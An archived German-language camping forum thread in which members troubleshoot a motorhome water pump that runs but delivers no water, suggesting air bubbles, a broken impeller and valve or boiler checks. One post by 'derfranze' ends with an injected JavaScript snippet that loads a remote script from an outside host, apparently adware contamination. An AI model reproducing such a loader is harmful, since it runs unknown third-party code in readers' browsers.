PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Es kommt kein Wasser



as61828
11.09.2012, 15:56
Hallo Camperfreunde
Wir wollen morgen nach Kärnten fahren.

Ich habe gestern ca. 70 lit Wasser gepunkert.
Heute kontrolliere ich alle Ausläße auch die WC-Spülung, aber es kommt niergend Wasser raus, obwohl man die Pumpe laufen hört. :(:(:(
Der Ansaugschlauch ist auf der Pumpe drauf.

Wo kann der Fehler liegen und wer hat einen guten Rat,
Der Dank ist jedem gewiß, meint adolfo

STO
11.09.2012, 16:04
ist der frostsschutzschalter (beim boiler) zu? (rinnt unterm auto wasser weg? ;) )
sind die filter sauber?
steht irgendwas auf dem schlauch? ;)
hast genug bordspannung?

AndyT
11.09.2012, 16:18
Hallo

hast überhaupt Wasser in Tank....könnte der Überlauf (Stoppel) undicht sein und über Nacht ist dir der Tank ausgeronnen.....:D

as61828
11.09.2012, 16:34
ist der frostsschutzschalter (beim boiler) zu? (rinnt unterm auto wasser weg? ;) )
sind die filter sauber?
steht irgendwas auf dem schlauch? ;)
hast genug bordspannung?

Hallo STO

Wenn ich den Boilerstoppel aufmache, dann rinnt Wasser. Filter sollte sauber sein, da erstens nur Trinkwasser gepunkert wurde und zweitens nach Gebrauch des Mobils immer das Wasser entleert wurde. 2011 wurde alles durchgespült, ergo sollte alles sauber sein.
Am Schlauch steht nichts, höchstens ich auf der Leitung.
Bordspannung ist genug, sonst würde die Pumpe nicht laufen
Bitte um weiter Vorschläge, meuint adolfo

as61828
11.09.2012, 16:37
Hallo

hast überhaupt Wasser in Tank....könnte der Überlauf (Stoppel) undicht sein und über Nacht ist dir der Tank ausgeronnen.....:D

Hallo Andy
melde Dich in Lutzmannsburg bei mir zu einem Glas Wein, weil Deine Meinung nicht zu übertreffen ist.
Wer lesen kann hat mehr davon, meint adolfo;););):D:D:D

AndyT
11.09.2012, 16:48
.......:D:D:D:D:D

könnte auch sein das die Pumpe kaputt ist
wenn ein Schlauch herunten ist schalte die Pumpe ein...kommt Wassser....???

oder nimm die Leitung runter und blas mal Luft durch......:)

stefferl
11.09.2012, 17:19
Mein Mann hat sich einmal gewundert, wieso beim Wegfahren der Tank wieder leer war, wo er doch am Abend vorher gefüllt hat. Ich hab ihn dann gefragt, ob er beide Abflußventile zugedreht hat. Kurzes Überlegen und dann "AAH!"

bertl27
11.09.2012, 18:16
Hallo Adolfo!



oder nimm die Leitung runter und blas mal Luft durch......:)

DAS hat bei meinem WoWa auch geholfen!

Eine lästige Luftblase war bei mir das "Übel"!

Pumpe runter; kräftig durch-/reinblasen; Pumpe rauf - müsste funzen....

Und sonst; wennst eh nach Kärnten fahrst - schau beim Grisu vorbei!

as61828
11.09.2012, 18:16
Mein Mann hat sich einmal gewundert, wieso beim Wegfahren der Tank wieder leer war, wo er doch am Abend vorher gefüllt hat. Ich hab ihn dann gefragt, ob er beide Abflußventile zugedreht hat. Kurzes Überlegen und dann "AAH!"



Hallo Stefferl
Ich habe alles durchgeprüft. Auch alle Eventualitäten gecheckt.:rolleyes::rolleyes::rolleyes:
Alles ist in Odnung nur das Wasser kommt nicht, meint adolfo

derfranze
11.09.2012, 18:23
und wenn ja dauert das eine kleine Weile bis der voll ist un dann kommt erst Wasser aus dem Hahn.

lg Franz!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();

italophilia
11.09.2012, 18:26
Wir hatten ein ähnliches Problem im Bad beim Wasserhahn/Duschkopf: nach dem Duschen den Schlauch etwas schlampig hinters Waschbecken zurückgestopft, eine Schlinge hat sich zugezogen und den Duschschlauch so geknickt - Wasserpumpe hat gearbeitet, Wasser ist natürlich keins durchgekommen. Hat auch ein bisschen gedauert, bis wir draufgekommen sind.

Also: hat sich die Zuleitung irgendwo verdreht/verlegt?

Akapi
11.09.2012, 18:50
Hallo Adolfo,
hatte selbiges Problem. Läuft die Pumpe mit höherer Drehzahl könnte Luft (Luftblase) im Schlauch sein.
Hilfe: In den Wassertank greifen, Pumpe schütteln .... bis sie ansaugt - fertig.
Funktioniert bei uns immer!
HP

Fendt Bear
11.09.2012, 18:56
Hallo Adolfo

Kann vieleicht sein das die Pumpe läuft und das Schaufelrad abgerissen ist?

andreas

schneck
11.09.2012, 19:44
Das Problem habe ich auch manchmal. Wie Akapi schon geschrieben hatt funktioniert es auch bei mir, in den Tank greifen Pumpe umlegen etwas rütteln und siehe da Wasser kommt.http://www.campingforum.at/campingforum/images/icons/icon10.gif
mfg
Schneck

STO
11.09.2012, 19:59
Boilerstoppel

oops... ich dachte, in deinem fahrzeug sei eine druckwasseranlage verbaut - wenn nicht, dann sind meine "ratschlaege" natuerlich nur bedingt brauchbar.

as61828
11.09.2012, 20:12
Wir haben die Pumpe ausgebaut und es wird eine neue eingebaut, und damit basta.
Ich danke Euch für Eure RAtschläge, meint adolfo

zotty
11.09.2012, 23:15
Hallo Adolfo
Da ist irgendwo eine große Luftblase drinnen. Das kommt bei mir immer wieder vor, daß nach einiger Zeit der leeren Leitungen das Wasser nicht kommt. Ich schalte dann die Pumpe immer wieder ein und gleich wieder aus und quetsche die Leitung zusammen, damit die darin befindliche Luft aufsteigt. Dauert manchmal eine ganze Weile, bis das funzt. Auch ein dazwischenliegendes Rücklaufventil kann das nicht ganz beheben.
lG Zotty

Ferdlnand
11.09.2012, 23:34
Hallo Adolfo

Kann vieleicht sein das die Pumpe läuft und das Schaufelrad abgerissen ist?

andreas

Auch meine Meinung, es sei denn die Pumpe ist nicht selbstentlüftend und der Tank war vollkommen leer.

lg Ferdl

stefferl
12.09.2012, 14:16
Wie schaut es mit dem Warmwasser aus? Weiß nicht, wie das bei dir verbaut ist. Der Warmwasserboiler muss sich erst füllen, dann kommt erst Wasser aus der Leitung. Hast du das bedacht? Das dauert ein Weilchen.

46erkurt
12.09.2012, 17:54
Wie schaut es mit dem Warmwasser aus? Weiß nicht, wie das bei dir verbaut ist. Der Warmwasserboiler muss sich erst füllen, dann kommt erst Wasser aus der Leitung. Hast du das bedacht? Das dauert ein Weilchen.

Aber auch nur wenn der Hebelmischer auf warm steht.

Kurt

stefferl
12.09.2012, 19:30
@46erkurt

Ja, du sprichst ein wahres Wort! Da nützen die Tipps nicht, wenn ein wesentlicher Punkt fehlt. Aber wenn es wirklich nur so etwas ist, was einem gerade nicht einfällt, reicht bei adolfo, dem erfahrenen Camper sicher ein Denkanstoß. Und wenn die Stöße nichts helfen, dann muss es was Gröberes sein.

westbahnmichi
13.09.2012, 08:21
Wir haben die Pumpe ausgebaut und es wird eine neue eingebaut, meint adolfo

Hallo adolfo

rinnts jetzt wieder???